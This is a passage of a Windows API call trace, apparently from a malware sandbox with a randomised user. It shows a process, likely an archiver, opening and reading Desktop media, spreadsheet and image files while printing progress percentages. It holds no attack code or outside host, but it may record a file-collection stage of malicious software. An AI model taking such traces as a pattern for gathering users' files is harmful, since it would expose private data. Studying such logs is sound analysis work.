(_Block=0x27fc20) [0058.193] malloc (_Size=0x8) returned 0x27fc20 [0058.193] free (_Block=0x27fb50) [0058.193] malloc (_Size=0x8) returned 0x27fb50 [0058.193] free (_Block=0x27fbb0) [0058.193] free (_Block=0x0) [0058.193] malloc (_Size=0x2) returned 0x27fbb0 [0058.193] free (_Block=0x27fbb0) [0058.193] free (_Block=0x0) [0058.193] malloc (_Size=0x8) returned 0x27fbb0 [0058.193] free (_Block=0x0) [0058.193] malloc (_Size=0x8) returned 0x27fc70 [0058.193] free (_Block=0x0) [0058.193] malloc (_Size=0x8) returned 0x27fc80 [0058.193] malloc (_Size=0x84) returned 0x1c85c20 [0058.193] free (_Block=0x0) [0058.193] malloc (_Size=0x8) returned 0x27fc90 [0058.193] free (_Block=0x0) [0058.193] malloc (_Size=0x8) returned 0x27fc40 [0058.194] free (_Block=0x0) [0058.194] malloc (_Size=0x4) returned 0x27fa70 [0058.194] free (_Block=0x0) [0058.194] malloc (_Size=0x8) returned 0x27fac0 [0058.194] free (_Block=0x0) [0058.194] malloc (_Size=0x8) returned 0x27fa80 [0058.194] malloc (_Size=0x20) returned 0x1c82d40 [0058.194] malloc (_Size=0x4) returned 0x27faa0 [0058.194] free (_Block=0x0) [0058.194] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd0 [0058.194] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xd4 [0058.194] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xd8 [0058.194] malloc (_Size=0x28) returned 0x1c83580 [0058.195] malloc (_Size=0x1) returned 0x27fab0 [0058.195] free (_Block=0x0) [0058.195] malloc (_Size=0x1) returned 0x27fb20 [0058.195] free (_Block=0x0) [0058.195] malloc (_Size=0x88) returned 0x1c85cb0 [0058.195] malloc (_Size=0x4) returned 0x27fb30 [0058.195] free (_Block=0x0) [0058.195] malloc (_Size=0x7c) returned 0x1c85d40 [0058.195] malloc (_Size=0x14c) returned 0x1c85dc8 [0058.195] malloc (_Size=0x98) returned 0x1c85f20 [0058.196] malloc (_Size=0x4c) returned 0x1c821c8 [0058.196] malloc (_Size=0x4c) returned 0x1c82220 [0058.196] free (_Block=0x1c821c8) [0058.196] malloc (_Size=0x2) returned 0x1c80a80 [0058.196] free (_Block=0x27fab0) [0058.196] malloc (_Size=0x2) returned 0x27fab0 [0058.196] free (_Block=0x27fb20) [0058.196] malloc (_Size=0x88) returned 0x1c85fc0 [0058.197] malloc (_Size=0x8) returned 0x27fb20 [0058.197] free (_Block=0x27fb30) [0058.197] ResetEvent (hEvent=0xd0) returned 1 [0058.197] ResetEvent (hEvent=0xd4) returned 1 [0058.197] ResetEvent (hEvent=0xd8) returned 1 [0058.197] free (_Block=0x0) [0058.197] malloc (_Size=0x8) returned 0x27fb30 [0058.197] free (_Block=0x0) [0058.197] malloc (_Size=0x4) returned 0x1c83af0 [0058.197] free (_Block=0x0) [0058.197] malloc (_Size=0x8) returned 0x1c83b00 [0058.197] free (_Block=0x0) [0058.197] malloc (_Size=0x4) returned 0x1c83b10 [0058.197] malloc (_Size=0x20) returned 0x1c82d68 [0058.197] malloc (_Size=0x8) returned 0x1c83b20 [0058.197] free (_Block=0x0) [0058.197] malloc (_Size=0x34) returned 0x1c86050 [0058.197] malloc (_Size=0x4) returned 0x1c83b30 [0058.197] free (_Block=0x0) [0058.308] GetCurrentProcessId () returned 0x888 [0058.309] GetCurrentThreadId () returned 0x898 [0058.309] QueryPerformanceCounter (in: lpPerformanceCount=0x22e8b8 | out: lpPerformanceCount=0x22e8b8*=17844207023) returned 1 [0058.309] GetTickCount () returned 0x1146bed [0058.502] malloc (_Size=0x14) returned 0x1c80800 [0058.502] realloc (_Block=0x0, _Size=0xa) returned 0x27f4d8 [0058.502] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xdc [0058.502] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe0 [0058.502] ResetEvent (hEvent=0xdc) returned 1 [0058.502] ResetEvent (hEvent=0xe0) returned 1 [0058.503] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x35d8da, _ArgList=0x1c85fc0, _InitFlag=0x0, _ThrdAddr=0x22e9a8 | out: _ThrdAddr=0x22e9a8) returned 0xe4 [0058.504] SetEvent (hEvent=0xdc) returned 1 [0058.504] free (_Block=0x0) [0058.504] malloc (_Size=0x4) returned 0x1c83bd0 [0058.504] free (_Block=0x0) [0058.504] malloc (_Size=0x4) returned 0x1c83be0 [0058.504] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x240000 [0058.504] malloc (_Size=0x8) returned 0x1c83bf0 [0058.504] malloc (_Size=0x22) returned 0x1c83610 [0058.505] free (_Block=0x1c83bf0) [0058.505] malloc (_Size=0x22) returned 0x1c83640 [0058.505] free (_Block=0x1c83610) [0058.505] GetTickCount () returned 0x1146ca8 [0058.505] strlen (_Str="0") returned 0x1 [0058.505] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="47Upt ff5iyL.avi", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0058.505] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="47Upt ff5iyL.avi", cchWideChar=16, lpMultiByteStr=0x1c82010, cbMultiByte=16, lpDefaultChar=0x22e774, lpUsedDefaultChar=0x22e760 | out: lpMultiByteStr="47Upt ff5iyL.avi \r", lpUsedDefaultChar=0x22e760) returned 16 [0058.505] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.505] fputs (in: _Str=" 0% + 47Upt ff5iyL.avi", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.506] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.506] free (_Block=0x1c83640) [0058.506] malloc (_Size=0x58) returned 0x1c866b0 [0058.506] malloc (_Size=0x8) returned 0x1c83bf0 [0058.506] malloc (_Size=0x6e) returned 0x1c86710 [0058.506] free (_Block=0x1c83bf0) [0058.506] malloc (_Size=0x6e) returned 0x1c867a0 [0058.507] free (_Block=0x1c86710) [0058.507] malloc (_Size=0x4) returned 0x1c83bf0 [0058.507] free (_Block=0x0) [0058.507] malloc (_Size=0xc) returned 0x1c860c0 [0058.507] malloc (_Size=0x6e) returned 0x1c86818 [0058.507] malloc (_Size=0x4) returned 0x1c83c00 [0058.507] free (_Block=0x0) [0058.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\47Upt ff5iyL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\47upt ff5iyl.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0058.507] free (_Block=0x1c867a0) [0058.507] GetFileSize (in: hFile=0xe8, lpFileSizeHigh=0x22e8d4 | out: lpFileSizeHigh=0x22e8d4*=0x0) returned 0xfe40 [0058.507] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0xfe40, lpOverlapped=0x0) returned 1 [0058.510] SetEvent (hEvent=0xd4) returned 1 [0058.510] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.402] GetTickCount () returned 0x11470ec [0062.402] strcmp (_Str1="+", _Str2="+") returned 0 [0062.403] wcscmp (_String1="47Upt ff5iyL.avi", _String2="47Upt ff5iyL.avi") returned 0 [0062.403] strlen (_Str="2") returned 0x1 [0062.403] strcmp (_Str1=" 2%", _Str2=" 0%") returned 1 [0062.403] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="47Upt ff5iyL.avi", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0062.403] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="47Upt ff5iyL.avi", cchWideChar=16, lpMultiByteStr=0x1c82010, cbMultiByte=16, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="47Upt ff5iyL.avi", lpUsedDefaultChar=0x22e868) returned 16 [0062.403] strcmp (_Str1=" 0% + 47Upt ff5iyL.avi", _Str2=" 2% + 47Upt ff5iyL.avi") returned -1 [0062.403] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.405] fputs (in: _Str=" 2% + 47Upt ff5iyL.avi", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.406] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.406] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.407] free (_Block=0x1c86818) [0062.407] free (_Block=0x1c860c0) [0062.407] CloseHandle (hObject=0xe8) returned 1 [0062.407] free (_Block=0x1c866b0) [0062.407] SetEvent (hEvent=0xd4) returned 1 [0062.407] free (_Block=0x1c860a8) [0062.407] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.414] malloc (_Size=0x8) returned 0x1c83c50 [0062.414] free (_Block=0x0) [0062.414] malloc (_Size=0x8) returned 0x1c83c60 [0062.414] free (_Block=0x0) [0062.414] malloc (_Size=0x10) returned 0x27f4d8 [0062.414] strcmp (_Str1="+", _Str2="+") returned 0 [0062.414] wcscmp (_String1="47Upt ff5iyL.avi", _String2="47Upt ff5iyL.avi") returned 0 [0062.414] strlen (_Str="2") returned 0x1 [0062.414] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="47Upt ff5iyL.avi", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0062.414] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="47Upt ff5iyL.avi", cchWideChar=16, lpMultiByteStr=0x1c82010, cbMultiByte=16, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="47Upt ff5iyL.avi \r", lpUsedDefaultChar=0x22e9a8) returned 16 [0062.415] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.415] fputs (in: _Str=" 2% 1 + 47Upt ff5iyL.avi", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.416] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.416] malloc (_Size=0x60) returned 0x1c85bb8 [0062.417] free (_Block=0x0) [0062.417] malloc (_Size=0x1) returned 0x27fb60 [0062.417] free (_Block=0x0) [0062.417] malloc (_Size=0x4) returned 0x27fbe0 [0062.417] free (_Block=0x0) [0062.417] malloc (_Size=0x8) returned 0x27fbf0 [0062.417] malloc (_Size=0x18) returned 0x1c860a8 [0062.417] malloc (_Size=0x8) returned 0x1c83c60 [0062.417] malloc (_Size=0x8) returned 0x27fc00 [0062.417] free (_Block=0x0) [0062.417] malloc (_Size=0x34) returned 0x1c864f8 [0062.417] malloc (_Size=0x4) returned 0x1c83c70 [0062.417] free (_Block=0x0) [0062.420] malloc (_Size=0x14) returned 0x1c860c8 [0062.420] realloc (_Block=0x0, _Size=0xa) returned 0x27f640 [0062.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8v1Sb42C0-_SO.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8v1sb42c0-_so.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.421] free (_Block=0x1c867a0) [0062.421] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x5853, lpOverlapped=0x0) returned 1 [0062.424] SetEvent (hEvent=0xd4) returned 1 [0062.424] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.424] GetTickCount () returned 0x11470fc [0062.424] strcmp (_Str1="+", _Str2="+") returned 0 [0062.424] strlen (_Str="3") returned 0x1 [0062.424] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="8v1Sb42C0-_SO.xls", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0062.424] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="8v1Sb42C0-_SO.xls", cchWideChar=17, lpMultiByteStr=0x1c82010, cbMultiByte=17, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="8v1Sb42C0-_SO.xls \r", lpUsedDefaultChar=0x22e868) returned 17 [0062.424] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.426] fputs (in: _Str=" 3% 1 + 8v1Sb42C0-_SO.xls", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.427] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.427] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.427] free (_Block=0x1c86818) [0062.427] free (_Block=0x1c879f0) [0062.427] CloseHandle (hObject=0xe8) returned 1 [0062.428] free (_Block=0x1c87da8) [0062.428] SetEvent (hEvent=0xd4) returned 1 [0062.428] free (_Block=0x1c879d8) [0062.428] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.429] malloc (_Size=0x10) returned 0x27f640 [0062.430] wcscmp (_String1="8v1Sb42C0-_SO.xls", _String2="8v1Sb42C0-_SO.xls") returned 0 [0062.430] strlen (_Str="3") returned 0x1 [0062.430] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="8v1Sb42C0-_SO.xls", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0062.430] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="8v1Sb42C0-_SO.xls", cchWideChar=17, lpMultiByteStr=0x1c82010, cbMultiByte=17, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="8v1Sb42C0-_SO.xls \r", lpUsedDefaultChar=0x22e9a8) returned 17 [0062.430] strcmp (_Str1=" 3% 1 + 8v1Sb42C0-_SO.xls", _Str2=" 3% 2 + 8v1Sb42C0-_SO.xls") returned -1 [0062.430] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.431] fputs (in: _Str=" 3% 2 + 8v1Sb42C0-_SO.xls", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.431] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.431] malloc (_Size=0x60) returned 0x1c85bb8 [0062.431] free (_Block=0x0) [0062.432] malloc (_Size=0x1) returned 0x27fb60 [0062.432] free (_Block=0x0) [0062.432] malloc (_Size=0x4) returned 0x27fbe0 [0062.432] free (_Block=0x0) [0062.432] malloc (_Size=0x8) returned 0x27fbf0 [0062.432] malloc (_Size=0x18) returned 0x1c860c8 [0062.432] malloc (_Size=0xc) returned 0x1c879d8 [0062.432] realloc (_Block=0x0, _Size=0xa) returned 0x1c879f0 [0062.432] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8ZRp Yo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8zrp yo.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.432] free (_Block=0x1c87eb8) [0062.432] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x17daa, lpOverlapped=0x0) returned 1 [0062.435] SetEvent (hEvent=0xd4) returned 1 [0062.435] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.436] GetTickCount () returned 0x114710b [0062.436] strcmp (_Str1="+", _Str2="+") returned 0 [0062.436] strlen (_Str="6") returned 0x1 [0062.436] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="8ZRp Yo.mp4", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.436] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="8ZRp Yo.mp4", cchWideChar=11, lpMultiByteStr=0x1c82010, cbMultiByte=11, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="8ZRp Yo.mp4 \r", lpUsedDefaultChar=0x22e868) returned 11 [0062.436] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.437] fputs (in: _Str=" 6% 2 + 8ZRp Yo.mp4", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.437] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.437] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.438] free (_Block=0x1c87e48) [0062.438] free (_Block=0x1c87a38) [0062.438] CloseHandle (hObject=0xe8) returned 1 [0062.438] free (_Block=0x1c87de8) [0062.438] SetEvent (hEvent=0xd4) returned 1 [0062.438] free (_Block=0x1c87a20) [0062.438] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.442] malloc (_Size=0x18) returned 0x1c86128 [0062.442] wcscmp (_String1="8ZRp Yo.mp4", _String2="8ZRp Yo.mp4") returned 0 [0062.442] strlen (_Str="6") returned 0x1 [0062.442] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="8ZRp Yo.mp4", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.442] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="8ZRp Yo.mp4", cchWideChar=11, lpMultiByteStr=0x1c82010, cbMultiByte=11, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="8ZRp Yo.mp4 \r", lpUsedDefaultChar=0x22e9a8) returned 11 [0062.443] strcmp (_Str1=" 6% 2 + 8ZRp Yo.mp4", _Str2=" 6% 3 + 8ZRp Yo.mp4") returned -1 [0062.443] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.443] fputs (in: _Str=" 6% 3 + 8ZRp Yo.mp4", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.444] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.444] malloc (_Size=0x60) returned 0x1c85bb8 [0062.444] free (_Block=0x0) [0062.444] malloc (_Size=0x1) returned 0x27fb60 [0062.445] free (_Block=0x0) [0062.445] malloc (_Size=0x4) returned 0x27fbe0 [0062.445] free (_Block=0x0) [0062.445] malloc (_Size=0x8) returned 0x27fbf0 [0062.445] malloc (_Size=0x18) returned 0x1c860e8 [0062.445] malloc (_Size=0x10) returned 0x1c87a20 [0062.445] realloc (_Block=0x0, _Size=0xa) returned 0x1c879d8 [0062.445] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\buFx.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bufx.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.445] free (_Block=0x1c87f70) [0062.445] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x1676d, lpOverlapped=0x0) returned 1 [0062.448] SetEvent (hEvent=0xd4) returned 1 [0062.448] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.448] GetTickCount () returned 0x114711b [0062.448] strcmp (_Str1="+", _Str2="+") returned 0 [0062.448] strlen (_Str="9") returned 0x1 [0062.448] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="buFx.bmp", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0062.448] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="buFx.bmp", cchWideChar=8, lpMultiByteStr=0x1c82010, cbMultiByte=8, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="buFx.bmp \r", lpUsedDefaultChar=0x22e868) returned 8 [0062.448] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.449] fputs (in: _Str=" 9% 3 + buFx.bmp", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.450] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.450] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.450] free (_Block=0x1c87f08) [0062.450] free (_Block=0x1c87a68) [0062.451] CloseHandle (hObject=0xe8) returned 1 [0062.451] free (_Block=0x1c87ea8) [0062.451] SetEvent (hEvent=0xd4) returned 1 [0062.451] free (_Block=0x1c87a50) [0062.451] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.456] malloc (_Size=0x20) returned 0x1c82db8 [0062.456] wcscmp (_String1="buFx.bmp", _String2="buFx.bmp") returned 0 [0062.456] strlen (_Str="9") returned 0x1 [0062.456] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="buFx.bmp", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0062.456] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="buFx.bmp", cchWideChar=8, lpMultiByteStr=0x1c82010, cbMultiByte=8, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="buFx.bmp \r", lpUsedDefaultChar=0x22e9a8) returned 8 [0062.456] strcmp (_Str1=" 9% 3 + buFx.bmp", _Str2=" 9% 4 + buFx.bmp") returned -1 [0062.456] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.457] fputs (in: _Str=" 9% 4 + buFx.bmp", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.458] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.458] malloc (_Size=0x60) returned 0x1c85bb8 [0062.458] free (_Block=0x0) [0062.458] malloc (_Size=0x1) returned 0x27fb60 [0062.458] free (_Block=0x0) [0062.458] malloc (_Size=0x4) returned 0x27fbe0 [0062.458] free (_Block=0x0) [0062.458] malloc (_Size=0x8) returned 0x27fbf0 [0062.458] malloc (_Size=0x18) returned 0x1c86108 [0062.458] malloc (_Size=0x18) returned 0x1c86168 [0062.459] realloc (_Block=0x0, _Size=0xa) returned 0x1c87a20 [0062.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0062.459] free (_Block=0x1c86538) [0062.459] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x11a, lpOverlapped=0x0) returned 1 [0062.460] SetEvent (hEvent=0xd4) returned 1 [0062.461] WaitForMultipleObjects (nCount=0x2, lpHandles=0x22e924*=0xd0, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0062.693] GetTickCount () returned 0x1147215 [0062.693] strcmp (_Str1="+", _Str2="+") returned 0 [0062.693] strlen (_Str="9") returned 0x1 [0062.693] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.693] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1c82010, cbMultiByte=11, lpDefaultChar=0x22e87c, lpUsedDefaultChar=0x22e868 | out: lpMultiByteStr="desktop.ini \r", lpUsedDefaultChar=0x22e868) returned 11 [0062.693] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.694] fputs (in: _Str=" 9% 4 + desktop.ini", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.695] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.695] ReadFile (in: hFile=0xe8, lpBuffer=0x240000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x22e8b0, lpOverlapped=0x0 | out: lpBuffer=0x240000*, lpNumberOfBytesRead=0x22e8b0*=0x0, lpOverlapped=0x0) returned 1 [0062.695] free (_Block=0x1c87f48) [0062.695] free (_Block=0x1c87a80) [0062.695] CloseHandle (hObject=0xe8) returned 1 [0062.695] free (_Block=0x1c87ee8) [0062.695] SetEvent (hEvent=0xd4) returned 1 [0062.696] free (_Block=0x1c87a68) [0062.696] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0062.696] malloc (_Size=0x30) returned 0x1c87de8 [0062.697] strcmp (_Str1="+", _Str2="+") returned 0 [0062.697] wcscmp (_String1="desktop.ini", _String2="desktop.ini") returned 0 [0062.697] strlen (_Str="9") returned 0x1 [0062.697] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0062.697] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="desktop.ini", cchWideChar=11, lpMultiByteStr=0x1c82010, cbMultiByte=11, lpDefaultChar=0x22e9bc, lpUsedDefaultChar=0x22e9a8 | out: lpMultiByteStr="desktop.ini \r", lpUsedDefaultChar=0x22e9a8) returned 11 [0062.697] strcmp (_Str1=" 9% 4 + desktop.ini", _Str2=" 9% 5 + desktop.ini") returned -1 [0062.697] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.698] fputs (in: _Str=" 9% 5 + desktop.ini", _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.699] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0062.699] 